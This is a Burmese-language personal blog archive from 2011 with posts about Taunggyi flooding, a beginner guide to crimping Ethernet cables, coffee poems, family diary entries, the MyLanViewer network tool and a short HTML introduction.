Thursday, October 27, 2011

တောင်ကြီး 2011 မီးပုံးပျံစာရင်းများ

 Taunggyi တန်ဆောင်တိုင် 2011 မီးပုံးပျံစာရင်းဖြစ်ပါတယ် နောက်ကျန်သည့်စာရင်းများကို မိုးလင်းမှပဲ ထပ်တင်ပေးပါဦးမည်ဗျာ...


Monday, October 10, 2011

Taunggyi မှာ ယနေ့ဒီလို

ဒီနေ့ အပြင်ကမိုးစိုစိုနဲ့ အပြန်ခဏနားမယ်ရှိသေးတယ် မြို့လယ်မီးပွိုင်နားတ၀ှက်မှာ ရေလျှံနေတယ်ဆိုတာနဲ့ ဓါတ်ပုံသွားရိုက်လိုက်တယ်။တောင်ကျရေနဲ့ မြောင်းတွေပိတ်ဆို့မှုကြောင့် ယခုလိုဖြစ်သွားရတာပါ ဒီနှစ်မှာ မိုးကလည်း အရမ်းကိုကောင်းနေတယ် ယခုထိရွာနေတုန်းပါပဲ တစ်ချို့ဆိုင်တွေဆို အလုပ်ပျက်ကုန်တော့တာပေါ့ ရွှေခရားကြီးလက်ဘက်ရည်ဆိုင်ဆို ခုဘာမှအလုပ်လုပ်မရတော့ဘူးလေ ဒီနှစ်ပိုင်းမှာ နေရာတော်တော်များများတွေမှာ ယခုလိုတွေကြုံနေကြရပါတယ်။အဓိကထဲမှာ မြေင်းတွေ ပိတ်ဆို့မှုကြောင့်လဲပါနေတယ်။ ကိုယ်နဲ့တော့မဆိုင်ပါဘူး လက်ယားပြီးရေးလိုက်မိပြန်ပေါ့ အဲလိုဖြစ်နေရတာမကောင်းပါဘူး ကျန်းမာရေးအတွက်ပါ စဉ်းစားစရာဖြစ်လာတယ် ငှက်ဖျားရောဂါ၊သွေးလွတ်တုတ်ကွေးရောဂါတို့ ၀မ်းပျက်ဝမ်းလျှောရာဂါတွေဖြစ်နိုင်တယ်လေ ထင်တာပဲ...:D

Saturday, October 1, 2011

နတ်ဝတ်ခေါင်း ညှပ်ကြမယ်။

နတ်ဝတ်ခေါင်း ညှပ်တဲ့နေရာမှာ Type 3 မျိုးရှိတယ်။
၁။ Straight Through Cable
၂။ Cross Cable
၃။ Roll-over cable ဆိုပြီးသုံးမျိုးရှိတယ်။
၁။ Straight Through Cable ဆိုတာ ဘယ်လို ညှပ်ရလဲဆိုတာ အရင်ပြောမယ်။ နတ်ကြိုးတစ်ချေင်းမှာ ဟိုဘက်မှာ တစ ဒီဘက်မှာ တစ ရှိတယ်မလား။ အဲဒီ နှစ်ဘက်လုံးကို ပုံစံတူ ခေါင်းညှပ်ပေးရပါမယ်။ ဘယ်လို ညှပ်ရမလဲဆိုတော့ အောက်ကပုံကိုကြည့်။ 

ဘယ်လိုနေရာမျိုးမှာ Straight Through Cable ဆိုတာကို သုံးရလဲဆိုရင် Computer ကနေ Switch တို. Hub တို.ကိုချိတ်ဆက်ချင်ရင် သုံးပါတယ်။

၂။ Cross Cable ကြိုးညှပ်ပုံကတော့ တဖက်မှာ Type A ကို ညှပ်ပြီး ကြိုးစတဖက်မှာ Type B ကို ညှပ်ပေးရပါမယ်။ အောက်ကပုံကိုကြည့်ပါ။ 







Cross Cable ကိုဘယ်လိုနေရာမှာသုံးလဲဆိုရင် Computer to Computer တို. Switch to Switch တို. ချိတ်ဆက်တဲ့နေရာမှာသုံး ပါတယ်။

၃။ Roll-over cable ဆိုတာကတော့ Router တွေကို ကွန်ပြူတာနဲ. Configure လုပ်တဲ့နေရာတွေမှာ ချိတ်ဆက်ဖို.အတွက်အသုံး ပြုပါတယ်။ Roll-over cable ကတော့ ကိုယ်တိုင်ညှပ်ဖို.မလွယ်ပါဘူး။ ဘာဖြစ်လို.လဲဆိုရင် ကြိုးစတဖက်က RJ-45 ခေါင်း ဖြစ်ပြီး နောက်တဖက်က Serial ခေါင်းပါ။ အောက်ကပုံမှာ ကြည့်ပါ။
ကျွန်တော်တို.တွေ PC to PC, Router to Router တို. Router to Hub တို. ချိတ်ဆက်တဲ့နေရာမှာ ဘာကြောင့် Type A နဲ. Type B ဆိုပြီး Cross Cable ကို ညှပ်ရလဲဆိုတာ နဲနဲပြောကြည့်မယ်။
နတ်ဝတ်ကြိုးတွေမှာ ၀ါယာကြိုးက ၈ ချောင်းပါတာမှန်ပေမယ့် တကယ်တန်း ဒေတာပို.ဆောင်တာက ၄ ကြိုးပဲအလုပ်လုပ်တာပါ။ ဖြူမော်(၁)၊ မော်(၂)၊ ဖြူစိမ်း(၃)၊ ပြာ(၄)၊ ဖြူပြာ(၅)၊ စိမ်း(၆)၊ ဖြူညို(ရ)၊ ညို(၈) ဆိုပြီး အရောင်တွေကို နာပါတ်တွေနဲ. သတ်မှက်ပေးကြည့်ပါ။ တကယ်ဒေတာပို.ဆောင်ဖို. အလုပ်လုပ်တာက ၁ ရယ် ၂ ရယ် ၃ ရယ် ၆ ရယ် ပါ။ အဲဒီတော့ ဒေတာပို.တဲ့ ၁ ရယ် ၂ ရယ် ၃ ရယ် ၆ ရယ် ကိုပဲ ပြောကြမယ်။
ဘယ်လိုအလုပ်လုပ်လဲဆိုရင် Transfer + (၁) က အခြားတဖက်က Reserve +(၃) အတွက်အလုပ်လုပ်ပေးပါတယ်။ ဒီဘက်ကလည့် ဒေတာပို. ဟိုဘက် ကလည်း ဒေတာပို.ဆို အဆင်မပြေဘူးလေ။ တဖက် Transfer ဆိုရင် တဖက်က Reserve ဖြစ်သင့်တာပေါ့။
Transfer - (၂) က အခြားတဖက်က Reserve -(၆) အတွက် အလုပ်လုပ်ပေးပါတယ်။ Reserve +(၃) က အခြားတဖက်က Transfer +(၁) အတွက် အလုပ်လုပ်ပေးတယ်။ Reserve -(၆) က အခြား တဖက်က Transfer -(၂) ကိုသွားတယ်။ ဒါဆို ပို.တာနဲ. လက်ခံတာနဲ.မျှသွားပြီ။ ဒါကတော့ Cross Cable ညှပ်တာရဲ့ Theory လေးပါ။






တစ်ချိန်ကလူ

လေထုက အသံတွေကိုယူလာ
ရင်ခုန်သံမပါ ငါ့စကားတွေမှာ
အသံတွေပြာနေရပြီပေါ့။
အဖြေမရှိတဲ့ ပုစ္ဆာ
နေ့ရက်ပေါင်းများစွာ ချတွက်
အကြိမ်ကြိမ်တွေထပ်
ပုစ္ဆာမှားနေတဲ့ နေ့ရက်တွေကို
ငါရေတွက် ရင်နစ်ရပါပြီ။


Thursday, September 29, 2011

Coffee can kill you...

ကော်ဖီတွေယိုစိမ့် ငါ့နေ့သစ်တွေမှာ
နင်ဖန်ဆင်းပေးခဲ့တာ...
Coffee can kill you
but i know that
ငါသိပေမဲ့ အနေခက်
ခါးသက်သက် ကော်ဖီတစ်ခွက်ပေါ့။
ငါ့ကဗျာတွေလို ငါစစ်မှန်တယ်
ခံစားမှုကိုအခြေခံတယ်လေ...
အခြေခံမဲ့ ခံစားချက်ကွက်လပ်နဲ့
ခါးသက်သက် ကော်ဖီတစ်ခွက်
ဘာကြောင့်ငါ့စီးဆင်းစေခဲ့တာလဲ..။
နေ့စဉ်ငါ ၀ါးမျိုခံနေရတယ်
နေ့စဉ်ပိတ်လှောင်ထားနေမိတယ်
နေ့စဉ်အိပ်ပျော်နေခဲ့တယ်
အချိန်မှန်ခါးနေမိတယ်
ငါ့ရင်တံခါးမှာ ချိန်ဆွဲထားတယ်
I know that i like !

Wednesday, September 28, 2011

ကော်ဖီခွက်လေး

အခုကျွန်တော် ကော်ဖီသောက်နေတယ် ဒီနေ့ကော်ဖီတင်မဟုတ် မုန့်နဲ့ မှာတမ်းပါရောက်ရှိလာတယ်။ ဘာကြောင့်လဲ ကျွန်တော် နေသိပ်မကောင်းချင်ဘူးဖြစ်နေတယ် မနေ့ကတည်းကဖြစ်နေတာ ဒါနဲ့ ဒီနေ့ ကော်ဖီလေးသောက် မုန့်လေးစားပြီး ဆေးသောက်လိုက်ပါတဲ့။ စာရေးနေရင် ကျွန်တော်ပြုံးပြီး ကျေနပ်နေမိတာတော့ အမှန်တရားဆိုတာပေါ့။ ကျွန်တော့်ဘ၀ အမောတွေကိုပြေစေခဲ့အောင် ဘုရားသခင် ဖန်းဆင်းများပေးလိုက်သလား။ ကော်ဖီအဖြစ် ဖန်းဆင်းပေးလိုက်သလား။ ဘာဖြစ်ဖြစ်ပါလေ ကျေးဇူးတင်နေမိတယ်။ ရင်ခုန်သံကော်ဖီဆီက ဘာမှမမျှာ်လင့်ချင်ဘူး ဒါပေမဲ့ သူ့ရဲ့ ကော်ဖီ ကိုယ်ပိုင်ရနံ့လေး ပျောက်သွားမှာကို စိုးထိတ်မိတယ်။ တစ်နေ့သောအခါ ကျွန်တော့်အနားမှာရှိနေတဲ့ သစ်ရွက်ခြောက်လေး ငေးကြည့်နေရင်း လေကဝှေ့တိုက် သယ်ယူသွားသတဲ့ဆိုတဲ့ ပုံပြင်သစ်တွေ ရှိနေဦးမှာလား။ မနေ့ကသူမအပြန် ကျွန်တော်ငေးကြည့်နေမိလိုက်တယ် သူ့ကျောကိုင်းထွက်ခွာချိန်ပေါ့ နှုတ်ဆက်ခြင်းက ကျွန်တော့်ရင်ဘက်ကို မနွေးထွေးစေခဲ့ဘူး ဒါဘာကြောင့်လဲလို့မေးရအောင် အဖြေကရှိပြီးသားဖြစ်နေခဲ့တယ်။ ၀ူးးးးးးးး တော်ပါပြီ ကျွန်တော့်အတွေးတွေ ပြန်ချုံ့ထားလိုက်တာကောင်းပါတယ်။ အတွေးကိုနောက်ပြန်လှည့်တော့လဲ သူ့မျက်နှာကို မြင်မိပြန်တယ်။ ကော်ဖီသောက်တိုင်း တစ်နေ့နဲ့တစ်နေ့ သူမျက်နှာမြင်နေမိတာ ရင်ခုန်သံနဲ့ ထပ်တူရှိနေခဲ့လေပြီ။

Friday, September 23, 2011

Coffee


ကော်ဖီသောက်တဲ့ရက်တွေအများကြီးမှာယခုနောက်ပိုင်းသောက်နေရတဲ့ကော်ဖီတွေကိုကျွန်တော်ခုံမင်လာခဲ့
တယ် ဘယ်တံဆိပ်လဲဟင်လို့တော့မမေးရဘူးနော်:Dအဲဒီကော်ဖီတံဆိပ်က ဈေးကွက်မှာမရှိလို့ပေါ့ကျွန်တော် တံဆိပ်ကတ်ပေးလိုက်တယ် အဲဒီကော်ဖီနာမည်လေးက ရင်ခုန်သံကော်ဖီပါတဲ့ဗျာ။ကျွန်တော်စကားတွေက ကာရံမပါရင်တောင် ဟန်ဆောင်မပါရင်ခုန်သံတွေကတော့ စစ်သတဲ့ဗျ။ ကျွန်တော်သူ့ကို ဘာမှပြောထွက်ခွင့်ရှိမည်မထင်။ကျေးဇူးတင်နေမိတာတော့အမှန် ကော်ဖီသောက်နေရခြင်းထက် အမှတ်တရ တစ်ခုဖြစ်စေခဲ့လို့ပါပဲ တကယ်ဆိုရင်ခုန်သံကော်ဖီလေးက ကျွန်တော့်နားရောက်လာတာမကြာသေးဘူး ဒါပေမဲ့ ကျွန်တော့်ကို အမြဲတမ်းအမှတ်ရစေခဲ့တယ်။ ကျွန်တော့်ရဲ့ အိပ်မက်မဟုတ်တဲ့ အိပ်မက်ဖြစ်ခဲ့ရင်တောင် ကော်ဖီသောက်တိုင်း သတိရနေမိပါပြီ။

စားသောက်ဝိုင်းရဲ့ ည

စားပွဲခုံတစ်ခုမှာ ကျွန်တော်နှင့်မိတ်ဆွေတစ်ယောက်အတူထိုင်ခဲ့ကြတယ်။ အဲဒီဆိုင်လေးက အစိမ်းသက်သက်မဟုတ်သလိုအမြဲတမ်းလဲမရောက်ဖြစ်ပါဘူး။စားပွဲထိုးကောင်လေးနှစ်ယောက်နဲ့တော့ရင်းနှီးနေပါတယ် ဒါနဲ့ဆိုင်အတွင်ရောက်ကတည်းကအဲကောင်လေးကိုအရင်မေးမိလိုက်တယ် အောင်ချမ်းသာဆိုတဲ့ ကောင်လေးကတော့ဒီဆိုင်မှာမလုပ်တော့ဘူးဆိုတာသိလိုက်ရတယ် နောက်တစ်ယောက် အငယ်လေး ဆိုတဲ့တစ်ယောက်တော့ရှိပါသေးတယ် ကျွန်တော်နဲ့မိတ်ဆွေတစ်ယောက်ထိုင်နေတဲ့ခုံကို ကလေးမလေး တစ်ယောက်က အစ်ကိုတို့ ဘာမှာမလဲရှင့် ဆိုတဲ့အသံကိုကြားလိုက်ရတယ်ဒါနဲ့ကျွန်တော်တို့ သောက်စရာတစ်ခုရယ် စားစရာတွေကိုမှာလိုက်ပါတယ်။ မိနစ်(30)လောက်အကြာမှာ နောက်ထပ်မိတ်ဆွေတစ်ယောက်ရောက်လာပါတယ်တခြားသူတော့မဟုတ် ကျွန်တော်နဲ့ အရင်အတူထိုင်တဲ့ မိတ်ဆွေနဲ့ကလုပ်ငန်းတူလုပ်ဖော်ကိုင်ဘက်တွေပါ။ ဒါနဲ့သုံးယောက်ဖြစ်သွားတယ်လေ လူစုံသလိုဖြစ်တော့ ထုံးစံအတိုင်း ရှေးဟောင်းနှောင်းဖြစ်တွေပြောလိုက် ရီလိုက် မောလိုက်နဲ့ညကိုတစ်ဖြေးဖြေးမှောင်စေခဲ့တယ်...မကြာဘူးနောက်ထပ်ထိုမိတ်ဆွေနှစ်ယောက်နဲ့လုပ်
ငန်းတူတစ်ယောက်ထပ်ရောက်လာခဲ့တယ် ရောက်တာနဲ့သူစကားလှမ်းပြောလိုက်တယ် ရွှေတောင် ရပ်ကွက်မှာ မီးပုံးပျံ အတွက် ယမ်းလုပ်ရင်း မတော်တစမှု့နဲ့ မီးထလောင်သွားကြောင်းသူပြောတယ် ကျွန်တော်လဲ စကားလေးထောက်ပေးလိုက်တယ် ဟေ ဘာတွေဖြစ်ကုန်လဲ လူတွေဘာဖြစ်လဲ အိမ်ကော ဘယ်လိုဖြစ်သွားလဲမေးလိုက်တယ်အိမ်ကတော့အတွင်းပိုင်းအကုန်ပါသွားတယ်လူတစ်ယောက်တော့ထိခိုက်
သွားတယ်လို့သူပြောခဲ့တယ်ဒါကတော့မီးပုံးပျံပွဲနီးလျှင် ဖြစ်လေ့ရှိပါတယ်ဒီလိုနဲ့ မေးခွန်းတွေအဖြေတွေနဲ့ကျွန်
တော်တို့စားသောက်ဝိုင်းလေးကပိုလို့မြိုင်လာပြီပေါ့ နောက်ဆုံးတစ်ယောက် ရောက်လာခဲ့တယ် အဲဒါကတော့ ရင်းနှီးတဲ့မိတ်ဆွေတစ်ယောက်ပါပဲ။နာရီက(7:30)ရှိပြန်ပေါ့ ပြန်မယ်စိတ်ကူးတော့မိုးလေးကရွာလာပြန်တယ်
မိတ်ဆွေကိုခုံမင်စိတ်ကြောင့်အိမ်ပြန်နောက်ကျခဲ့ရပြီ။ဒါပေတီးတန်ဖိုးရှိတဲ့ညတစ်ညတစ်ဖိုးရှိတဲ့ညတစ်ညလို့ခံ
စားရင်း နောက်ကျပြန်တဲ့အိမ်ကိုရောက်သွားခဲ့ပါတယ်။(ကျေးဇူးတင်ပါသည်)

Monday, September 12, 2011

MyLanViewer

စာမရေးဖြစ်တာ အရမ်းကြာသွားပြီ မအားတဲ့ကြားထဲကေ ရးမယ်လုပ်ပြန်တော့ ဖီလင်မလာတော့ ရေးမရဖြစ်နေတယ် ခုတော့ ကျွန်တော်လိုအပ်လို့ ဒေါင်းလုပ်စွဲပြီး သုံးကြည့်တဲ့အခါ အိုကေသွားတယ်ဗျာ..ဟော စာဖတ်သူပြောတော့မယ် ဘာကိုဒေါင်းလို့ ဘာကိုသုံးလို့ အိုကေနေလဲမသိဘူးဆိုပြီး :D ဒီလိုပါ ကျွန်တော် wireless လွှင့်ပေးတဲ့ အိမ်မှာ သူက ကျွန်တော်တို့ လိုင်းကိုပြန်ဖမ်းမယ်ပေါ့ ဘာနဲ့ပြန်ဖမ်းလဲဆို Wireless Outdoor CPE (TPLINK) နဲ့ပါ အဲဒီထဲမှာ အဲဒီဗူးကို ကျွန်တော် ပေးခဲ့တဲ့အိုင်ပီးကို မမှတ်မိတော့ဘူးလေ Reset ပြန်လုပ်မယ်ဆိုလဲ အခက်ခဲတွေက ရှိနေတော့ အဲဒီ software လေး Install လုပ်ပြီး ရှာလိုက်တော့ အိုကေသွားပါတယ် IP တင်မကပါဘူး တစ်ခြား အရာတွေပါ အများကြီးအသုံးပြုလို့ရနိုင်ပါသေးတယ် အရမ်းလွယ်ကူတဲ့အတွက် အသေးစိတ်ကို မပြောပြတော့ပါဘူး ကိုယ်တိုင်စမ်းကြည့်လိုက်ပါ အဆင်ပြေပါမယ်။Software နာမည်လေးကတော့ Mylanviewerဖြစ်ပါတယ်။ Install လုပ်ပြီးပုံလေးကို ဖော်ပြပေးထားပါတယ်။ကျေးဇူးတင်ပါတယ်။ Software ကို Google မှာရှာပြီးဒေါင်းလဲ ရနိုင်ပါတယ် အလွယ်တကူဒေါင်းချင်သူများအတွက် အောက်ကလင့်မှာ ဒေါင်းယူသွားနိုင်ပါကြောင်း....။

Wednesday, June 22, 2011

တူယှဉ်တွဲ

ချိုမြိန်တဲ့ အပြောင်းလဲတွေကြားမှာ...
ခါးသီးမှုတွေဟာလဲ အစဉ်လိုက်ရှိနေခဲ့တယ်..။
ရရှိခြင်းတွေရဲ့ အတိတ်မှာ...
ပေးဆပ်ခဲ့ရခြင်းတွေ ရှိနေခဲ့မှာပေါ့...။
အိပ်ပျက်ခဲ့ရခြင်းမှာ...
မအိပ်ခဲ့ရခြင်းတွေရှိမှာပေါ့...။
နေထွက်တယ်ဆိုတာ
ပြန်ဝင်ဖို့နေရာရှိခဲ့လို့နေမှာပေါ့...။
မွေးဖွားခြင်းတွေမှာ..
သေဆုံးခြင်းက ရှိနေဦးမှာပဲပေါ့..။
သို့သော်...သို့သော်
သူတို့တွေမှာ အပြန်လှန်ရှိနေကြသတဲ့လား....။

Saturday, June 11, 2011

ကြေကွဲအခန်း

ဖုန်းထဲက အသံဆုံးသွားချိန်မှာ ကျွန်တော်မျက်ရည်တွေဝဲနေမိတယ် ၀မ်းနည်းလို့ဖြစ်သလို မကျေနပ်မှုတွေကြောင့်လဲဖြစ်နိုင်ပါတယ် ဒီနေ့ ဖေဖေ့ဆီက ဖုန်းလာတယ်လေ သားနေကောင်းရဲ့လား သားအမေပြောနေတယ် ဖုန်းမဆက်လို့တဲ့လေ မင်းအဆင်မှပြေရဲ့လား မင်းအမေလဲ နေတော့ကောင်းပါတယ်ကွာ ဒါပေမဲ့ လက်ပြင်အောင့်နေတယ် ခြေဖျားလေးတွေမှာ ကြင်သလိုဖြစ်နေတယ်တဲ့ အဖေ ဆေးခန်းသွားဖို့ပြောတော့ ရတယ် မသွားဘူး သက်သာမှာပါဆိုပြီးနေတယ်။ဖေဖေ အဲလိုပြောပြီးချိန်မှာ ကျွန်တော် အရမ်းဝမ်းနေနေ ပြီ။ နောက်ထပ် ဖေဖေထပ်ပြောတယ် မမ တို့ လင်မယားအကြောင်းပါ ကျွန်တော့်မိဘတွေဟာ (လျော်ဖြူတောဆိုတဲ့ ရွာတစ်ရွာမှာ နှစ်စဉ် ၀တ်ဆောက်တည် တဲ့ သံဃာတော်များကို အလူလုပ်ပါတယ်) အဲဒီနေ့မှာပဲ ကျွန်တော့် မမ အိမ်စောင့်နေခဲ့တယ် ပြီးတော့ ဖေဖေ နဲ့မေမေ ပြန်လာတော့ စာတစ်စောင်ထားခဲ့တယ် မမ သူ့သမီးနဲ့အတူ သူ့အမျိုးသားရှိတဲ့ အရပ်ကိုပြန်သွားပြီဆိုတဲ့အကြောင်းပေါ့ သူ့အမျိုးသားဟာ မေမေတို့အိမ်ကနေထွက်သားတာ (3)လကျော်ရှိနေပြီ သူ့အိမ်ပြန်ပြီး ငွေရှာသွားတယ်လို့သိရတယ် အဲလိုနဲ့ ခုချိန်ထိ ပြန်မလာဘူး။ဖြစ်ပုံက မပြေလည်မူတွေကြောင့်ပါပဲ အဲလိုနဲ့ မမ လည်း မိဘတွေကို ဖွင့်မပြောပဲ အဲဒီအလူနေ့မှာပဲ စာချန်ခဲ့ပြီး အိမ်ကထွက် သွားခဲ့ပါတယ်။ မေမေ့မှာ သူ့မြည်မက အရမ်းချစ်တာလေ အခုဆိုမနေတက်ဘူးပေါ့။ လက်ရှိအိမ်မှာ ဖေဖေနဲ့ မေမေ နှစ်ယောက်ပဲရှိတော့တယ် ကျန်တာကတော့ အလုပ်သမားတွေရှိတာပေါ့။ ကျွန်တော်က လဲ မိုင်ချီဝေးတဲ့ တစ်နေရာမှာ ဘ၀တက်လမ်းအတွက် ထွက်ခွာခဲ့တာကြာပြီ အဝေးကနေ ဒီလိုအဖြစ်ပျက်တွေကြားရတော့ ကျွန်တော့် မျက်ရည်တွေက ဘယ်နေပါတော့မလဲ မြေခရတော့တာပေါ့။ ပထမ တွေးမိလိုက် တာက ငါအိမ်ပဲပြန်နေတော့မယ်အတွေးတစ်ခုပါပဲ မိဘတွေကို အချိန်ကြာပစ်မထားချင်တဲ့စိတ်ပါပဲ သို့သော် လက်ရှိ ကျွန်တော်ရှင်သန် ကြိုး စားနေခြင်းက ကျွန်တော့်မိဘတွေအတွက် ဦးစွာပထမပါပဲ။ ခုချိန်ထိ ဖြစ်သင့်သလောက်ဖြစ်မလာသေးပါဘူး။ လောင်းရိပ်မိတဲ့နေရာကို ရောက်နေသလားခံစားမိတယ်ဗျာ။ ကျွန်တော်တို့ မိသားစု အသိုက်မြုံလေး အဲလိုကွဲနေရတာတွေဟာ ဘာကြောင့်လဲ။ မမ တို့မိသားစုကလည်း တစ်မျိုးပါပဲ။ ယောက်ဖ လို့မသက်မှတ်ပါဘူး ညီကိုလိုပါပဲ မမ အမျိုးသားဟာ အလုပ်ကိုင် မယ်မယ်ရရမရှိ ငွေရှာခြင်းမရှိ သူ့အိမ်သူပြန်နေပြီဆို တော့ မေမေနဲ့ ဖေဖေက ဘယ်ကြည်ဖြူနိုင်ပါ့မလဲ အိမ်မှာနေ အိမ်လုပ်ငန်းတွေ ဦးစီးလုပ်ကိုင်ပြီးနေခွင့်ပေးထားတယ် အဲလိုလဲမလုပ် အပြင်မှ လုပ်ပြီး လဲငွေမရှာတော့ ဝေးပြီးရင်းဝေးနေရတော့တာပဲ။ အခုဆိုရင် မေမေနဲ့ ဖေဖေ နှစ်ယောက်တည်းပါလား အတွေးက ကျွန်တော့်ကို လှမ်း ခေါ်နေတာပါပဲ။ ကျွန်တော် သင်္ကြန်ရှေ့က အိမ်ခဏပြန်ဖြစ်ပါတယ် ဖေဖေနဲ့မေမေကို ကျွန်တော့်စိတ်ကူး ပြောပြလိုက်ခဲ့တယ် အဲဒါက ကျွန်တော်နဲ့အတူ
မေမေတို့လာနေပါလား အပြီးပိုင် လာနေဖို့ပါပဲ လက်ရှိ ရှိနေတဲ့ အရာတွေကို ရောင်းချခဲ့လိုက် ကျွန်တော်ရှိတဲ့အရပ်မှာ အခြေချမယ် ရောင်းချပြီး ရလာတဲ့ ငွေတစ်ချို့ကို အိပ်နဲ့ဝိုင်းအသင့်သင့်ဝယ်ပြီးနေ ဘာမှမလုပ်ပါနဲ့တော့ ကျန်ငွေတစ်ချို့ကို ဘဏ်မှာအပ်ထားပြီး ဘဏ်တိုးလေးနဲ့ စားပေါ့ ကျွန်တော်က ဆက်ပြီးကြိုးစားမယ် ငွေရှာမယ်ပေါ့ မမ တို့ မိသားစုပါ အတူလိုက်နေမယ်ဆိုလဲ ရပါတယ် ဒါပေမဲ့ ဒီခေတ်မှာ အိမ်မှာထိုင်နေလို့ တော့မရဘူးပေါ့ မမ လဲ အလုပ်လုပ် ရွှေယောက်ဖလည်း အလုပ်လုပ် ဒီလိုနဲ့ တိုးတက်ရေးလမ်းကြောင်းကိုလျှောက်မယ် ဆိုတဲ့စိတ်ကူးပါပဲ။ ဆိုလိုတာက မေမေရဲ့ ချက်မြုပ်ဒေသလေးက အပြီးပိုင်ခွဲခွာစေလိုတာမဟုတ်ပါဘူး အိမ်တွေဝိုင်းတွေ တစ်ချိုချန်ထားခဲ့ပေါ့ အဲလိုပါ။ ဖေဖေက တော့ အဲလိုလုပ်ချင်တယ် ကျွန်တော့်စိတ်ကူးကို သဘောကျပါတယ် မေမေကတော့ အင်းမလုပ်အဲမလုပ်ပါပဲ ကျွန်တော့်စိတ်ကူးကိုလဲ မငြင်းရက်၊မစွန့်ခွာရက်ဖြစ်နေရှာတယ်လေ ကျွန်တော့်အတွက် အဝေးတစ်နေရာကနေ လွမ်းစိတ် ပူပင်စိတ်တွေနဲ့ပေါ့ ထိုနည်းတူ မိဘတွေမှာလဲ အဲထက်ပိုမှာပါ။ ကျွန်တော် သတိရတယ်ဗျာ အရင်ချိန်တွေကို မောင်နှစ်မနှစ်ယောက် ဖေဖေရယ် မေမေရယ် မိသားစုလေးယောက် နွေးထွေးခဲ့တယ် မမ က ဟင်းချက်ကောင်းတယ် ပြီးတော့ မုန်းအမျိုးမျိုး ကျွန်တ်ာတို့ကို လုပ်ကျွေးတယ် မေမေကလဲ အိမ်အလုပ်လုပ်ရင် ဆန်စက်ဘက်မှာလဲ ဦးစီးတယ် ဖေဖေကတော့ အစုံပေါ့ ကျွန်တော် ရှိစဉ်က ဆန်စက်ကို ကျွန်တော့်ဦးစီးလုပ်ကိုင်ခိုင်းပါတယ်။ ခုနောက်ပိုင်းမှာ ဆန်စက်တွေဟာ ပေါများလာသည့်အတွက် အရင်လောက်တော့ အဆင်ပြေချင်း မရှိတော့ဘူးပေါ့။ နောက် တစ်ခုက ကျွန်တော်တို့ စိတ်ကူးထားတဲ့အိပ်လေး ပါပဲ အိပ်ခန်းငါးခန်းပါတဲ့အိမ်လေး ဆောက်ဖို့ပါပဲ တစ်ဝက်လောက်ပြီးသွားပါပြီ ပုံစံကတော့ တစ်ထပ်တိုက်ပုလေးပါ အရှေ့မှာပန်းခြံလုပ်မယ် ခြံဝန်းကကျယ်တယ်။တစ်ထပ်တိုက်ကို ခေါင်ပေါ်မှာ ၀ရံတာလုပ်မယ် အပန်းဖြေဖို့ခံလှလှလေး တွေနဲ့ အမိုးထက်လုပ်မယ် ၀ရံတာတက်ဖို့အတွက် လိုင်ကောက်ကွေးလှေကားထစ်လေးတွေနဲ့ပေါ့။အဲဒါတွေလဲ အားလုံးရပ်တန့်သွားခဲ့တယ် ဘာကြောင့်လဲဆိ ကျွန်တော်ကလဲ ကျောင်းပြီးကတည်းက အဝေးတစ်နေရာရောက်နေခဲ့တယ် ဘ၀အတွက် စာထွက်သင်တာပါပဲ ဘ၀စားဝတ်နေရေးအတွက် ကိုယ်ကိုတိုင် ထူထောင်ချင်စိတ်ရယ် ပညာသင်မယ် ငွေရှာမယ်ပေါ့ အဲလိုထွက်သွားခဲ့တယ်။ မမ က အိမ်ထောင်ကျသွားတယ် အဲလိုနဲ့ ကျွန်တော် အိမ်လေးကို ဖေဖေနဲ့ မေမေ ဆက်ပြီးတော့မဆောက်ပဲ ရပ်ထားခဲ့ကြတယ် သားသမီးတွေ အဝေးရောက်ကုန်ပြီ သူ့နေရာနဲ့သူ အခြေချ အိမ်ထောင်ကျမှာပဲ အတွေးကြောင့်ပါပဲ တကယ်တော့ အဲလိုမဟုတ်ပါဘူး ကျွန်တော် အဲအိမ်လေးကို ဆက်ဆောက်မယ် မိသားစုတွေ ပြန်ဆုံရာ စံအိမ်လေးပေါ့။ ယခုချိန်မှာ ကျွန်တော့မိဘ တစ်စုံတစ်ခုများဖြစ်ခဲ့ရင်တော့ ကျွန်တော် သေသင့်ပါပြီ ကျွန်တော်သားမိုက်ဖြစ်ရပြီလား။ အချိန်နဲ့တပြေးညီ ကြိုးစားပြီး မိဘတွေနဲ့ သိုက်သိုက်ဝန်းဝန်နေဖို့ ကျွန်တော်ကြိုးစားရတော့မယ် သို့မဟုတ် ကျွန်တော်ရှိတဲ့ အရပ်မှာ ခေါ်ထားလိုက်တော့မယ်။ ညဆိုရင် တစ်ယောက်တည်း ကျွန်တော်ကြေကွဲ အခန်းငယ်ထဲမှာပေါ့ အဲလိုညတွေ ကုန်ဆုံးပါစေတော့။ ဖေဖေ နဲ့မေမေ နေကောင်း ကျန်းမာပါစေ။ အဝေးရောက်သား

Thursday, June 9, 2011

Blog / HTML လေ့လာခြင်း (၁)

Close Your rating was successfully added.
Close Sorry, an error occurred while adding your rating.

Sunday, 13 March 2011 at 08:53

What is HTML?

HTML ဆိုတာ Web Pages တွေကို ပေါ်လာအောင်ရေးထား-ဲ့ Web Page ရေးနည်း
ဘာသာစကားတစ်မျိုး- ဖစ်ပါတယ် ။

HTML ရဲ့ အရှည်ကတော့ Hyper Text markup Language လို့ခေါ်ပါတယ် ။

Markup Language ဆိုတာကတော့ Markup Tags လေးတွေအများကြီးန-့  ဖွဲ့စည်းထားတာပါ ။

HTML ကတော့ အဲသည့် Markup Tags လေးတွေကို အသုံးပြုပြီး Web Pages
အနေနဲ့ဖေါ်ပြသွားတ- ပါ ။

HTML Tags

HTML markup tags တွေကို အများအားဖြင့် HTML Tags လို့ အလွယ်တကူခေါ်ကြပါတ-်။

ကဲဒါဆို HTML Tags ရဲ့ စည်းကမ်းလေးတွေကိ- လေ့လာကြည့်ရအောင် ။

1. Angle brackets < > လေးတွေနဲ့ ခတ်ရပါ့မယ် ။ ( ဥပမာ ။ < html > )

2. အစ အဆုံး အတွဲလေးတွေနဲ့ ရှိရပါ့မယ် ။ အဆုံးက / လေးတစ်ချက်ခံရပါမ-်။

(ဥပမာ ။ ….. ) အဲသည့်အစဖွင့် ။အဆုံးပိတ်လေးတွေ-ို Opening Tags and
Closing Tags လို့ခေါ်ပါတယ် ။

အဲသည်လို့ HTML Tags လေးတွေနဲ့ HTML Documents လေးတွေ လုပ်။
နောက်ဆုံးမှာတော့ Web Pages တွေအဖြစ် ချိတ်ဆက်ပြီး ပုံပေါ်လာတာပါဘဲ ။

________________________________________
HTML Documents = Web Pages

